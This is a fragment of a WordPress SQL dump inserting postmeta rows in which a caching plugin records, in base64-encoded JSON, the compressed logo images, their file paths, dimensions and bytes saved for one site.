INSERT INTO `wp_postmeta` VALUES (30492, 201, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtNC5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTQucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo1NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzLTQucG5nIiwicmVkdWN0aW9uIjozNjA5LCJ0aW1lIjoxNDgzNTkyNzAxLCJpZCI6IjIwMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtNC0yMDB4NTcucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo1NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vycy00LTIwMHg1Ny5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzLTQtMjAweDU3LnBuZyIsInJlZHVjdGlvbiI6MjM2OSwidGltZSI6MTQ4MzU5MjcwNSwiaWQiOjIwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTQtMTE0eDU3LnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTQtMTE0eDU3LnBuZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiNTciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnMtNC0xMTR4NTcucG5nIiwicmVkdWN0aW9uIjoxMTMzLCJ0aW1lIjoxNDgzNTkyNzA4LCJpZCI6MjAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtNC0xODB4NTcucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtNC0xODB4NTcucG5nIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiI1NyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vycy00LTE4MHg1Ny5wbmciLCJyZWR1Y3Rpb24iOjIxMzksInRpbWUiOjE0ODM1OTI3MTEsImlkIjoyMDF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30493, 200, 'wpfc_optimisation_reduction', '5705'); 
INSERT INTO `wp_postmeta` VALUES (30494, 200, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtMS1lMTQ3MTM0MzMzMTgxMy5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo1NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMucG5nIiwicmVkdWN0aW9uIjo2NCwidGltZSI6MTQ4MzU5MjcxOCwiaWQiOiIyMDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMtMjAweDU3LnBuZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMtMS1lMTQ3MTM0MzMzMTgxMy0yMDB4NTcucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vycy0xLWUxNDcxMzQzMzMxODEzLTIwMHg1Ny5wbmciLCJyZWR1Y3Rpb24iOjIzNjksInRpbWUiOjE0ODM1OTI3MjEsImlkIjoyMDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vycy0xLWUxNDcxMzQzMzMxODEzLTExNHg1Ny5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vycy0xLWUxNDcxMzQzMzMxODEzLTExNHg1Ny5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjU3IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMtMTE0eDU3LnBuZyIsInJlZHVjdGlvbiI6MTEzMywidGltZSI6MTQ4MzU5MjcyNSwiaWQiOjIwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMtMTgweDU3LnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzLTEtZTE0NzEzNDMzMzE4MTMtMTgweDU3LnBuZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNTciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnMtMS1lMTQ3MTM0MzMzMTgxMy0xODB4NTcucG5nIiwicmVkdWN0aW9uIjoyMTM5LCJ0aW1lIjoxNDgzNTkyNzI4LCJpZCI6MjAwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30495, 163, 'wpfc_optimisation_reduction', '31809'); 
INSERT INTO `wp_postmeta` VALUES (30496, 163, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMucG5nIiwid2lkdGgiOjUxMiwiaGVpZ2h0Ijo1MTIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLnBuZyIsInJlZHVjdGlvbiI6MjU4NCwidGltZSI6MTQ4MzU5MjczNiwiaWQiOiIxNjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMzQweDM0MC5wbmciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTM0MHgzNDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTM0MHgzNDAucG5nIiwicmVkdWN0aW9uIjo0MzY0LCJ0aW1lIjoxNDgzNTkyNzQxLCJpZCI6MTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMjUweDI1MC5wbmciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTI1MHgyNTAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTI1MHgyNTAucG5nIiwicmVkdWN0aW9uIjoyMjcwLCJ0aW1lIjoxNDgzNTkyNzQ2LCJpZCI6MTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMjAweDIwMC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTIwMHgyMDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTIwMHgyMDAucG5nIiwicmVkdWN0aW9uIjoxNjU2LCJ0aW1lIjoxNDgzNTkyNzUwLCJpZCI6MTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMjI1eDIyNS5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTIyNXgyMjUucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTIyNXgyMjUucG5nIiwicmVkdWN0aW9uIjoyMDExLCJ0aW1lIjoxNDgzNTkyNzU1LCJpZCI6MTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtNTEweDUxMi5wbmciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTUxMHg1MTIucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTUxMHg1MTIucG5nIiwicmVkdWN0aW9uIjoyNTQ4LCJ0aW1lIjoxNDgzNTkyNzU5LCJpZCI6MTYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0xMTR4MTMwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMTE0eDEzMC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTExNHgxMzAucG5nIiwicmVkdWN0aW9uIjo1MDksInRpbWUiOjE0ODM1OTI3NjMsImlkIjoxNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTE4MHgxODAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0xODB4MTgwLnBuZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMTgweDE4MC5wbmciLCJyZWR1Y3Rpb24iOjExNTAsInRpbWUiOjE0ODM1OTI3NjcsImlkIjoxNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTE5MngxOTIucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0xOTJ4MTkyLnBuZyIsIndpZHRoIjoiMTkyIiwiaGVpZ2h0IjoiMTkyIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMTkyeDE5Mi5wbmciLCJyZWR1Y3Rpb24iOjgxNCwidGltZSI6MTQ4MzU5Mjc3MSwiaWQiOjE2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMjQ3eDMwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTI0N3gzMDAucG5nIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0yNDd4MzAwLnBuZyIsInJlZHVjdGlvbiI6Mjg2OCwidGltZSI6MTQ4MzU5Mjc3NywiaWQiOjE2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMjcweDI3MC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTI3MHgyNzAucG5nIiwid2lkdGgiOiIyNzAiLCJoZWlnaHQiOiIyNzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0yNzB4MjcwLnBuZyIsInJlZHVjdGlvbiI6MjY5MywidGltZSI6MTQ4MzU5Mjc4MiwiaWQiOjE2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMzAweDMwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTMwMHgzMDAucG5nIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0zMDB4MzAwLnBuZyIsInJlZHVjdGlvbiI6MzQyMCwidGltZSI6MTQ4MzU5Mjc4NywiaWQiOjE2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtMzJ4MzIucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0zMngzMi5wbmciLCJ3aWR0aCI6IjMyIiwiaGVpZ2h0IjoiMzIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My0zMngzMi5wbmciLCJyZWR1Y3Rpb24iOjExOSwidGltZSI6MTQ4MzU5Mjc5MSwiaWQiOjE2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Nyb3BwZWQtbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMtNDAweDQwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jcm9wcGVkLW1zbG9nby0xLWUxNDcxMjg5NTE1NzkzLTQwMHg0MDAucG5nIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY3JvcHBlZC1tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My00MDB4NDAwLnBuZyIsInJlZHVjdGlvbiI6NDgwMywidGltZSI6MTQ4MzU5Mjc5NywiaWQiOjE2M31d'); 
INSERT INTO `wp_postmeta` VALUES (30497, 84, 'wpfc_optimisation_reduction', '143'); 
INSERT INTO `wp_postmeta` VALUES (30498, 84, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nb19tcy0xLnBuZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nb19tcy0xLnBuZyIsIndpZHRoIjoxNTIsImhlaWdodCI6ODMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sb2dvX21zLTEucG5nIiwicmVkdWN0aW9uIjoxNDMsInRpbWUiOjE0ODM1OTI4MDQsImlkIjoiODQifV0='); 
INSERT INTO `wp_postmeta` VALUES (30499, 83, 'wpfc_optimisation_reduction', '2673'); 
INSERT INTO `wp_postmeta` VALUES (30500, 83, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby00LnBuZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby00LnBuZyIsIndpZHRoIjoxNjcsImhlaWdodCI6OTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sb2dvLTQucG5nIiwicmVkdWN0aW9uIjoyNjczLCJ0aW1lIjoxNDgzNTkyODA5LCJpZCI6IjgzIn1d'); 
INSERT INTO `wp_postmeta` VALUES (30501, 50, 'wpfc_optimisation_reduction', '1368'); 
INSERT INTO `wp_postmeta` VALUES (30502, 50, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9tc2xvZ28tMS1lMTQ3MTI4OTUxNTc5My5wbmciLCJ3aWR0aCI6MTY3LCJoZWlnaHQiOjkxLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbXNsb2dvLTEtZTE0NzEyODk1MTU3OTMucG5nIiwicmVkdWN0aW9uIjoxMzY4LCJ0aW1lIjoxNDgzNTkyODE0LCJpZCI6IjUwIn1d'); 
INSERT INTO `wp_postmeta` VALUES (30503, 42, 'wpfc_optimisation_reduction', '3230'); 
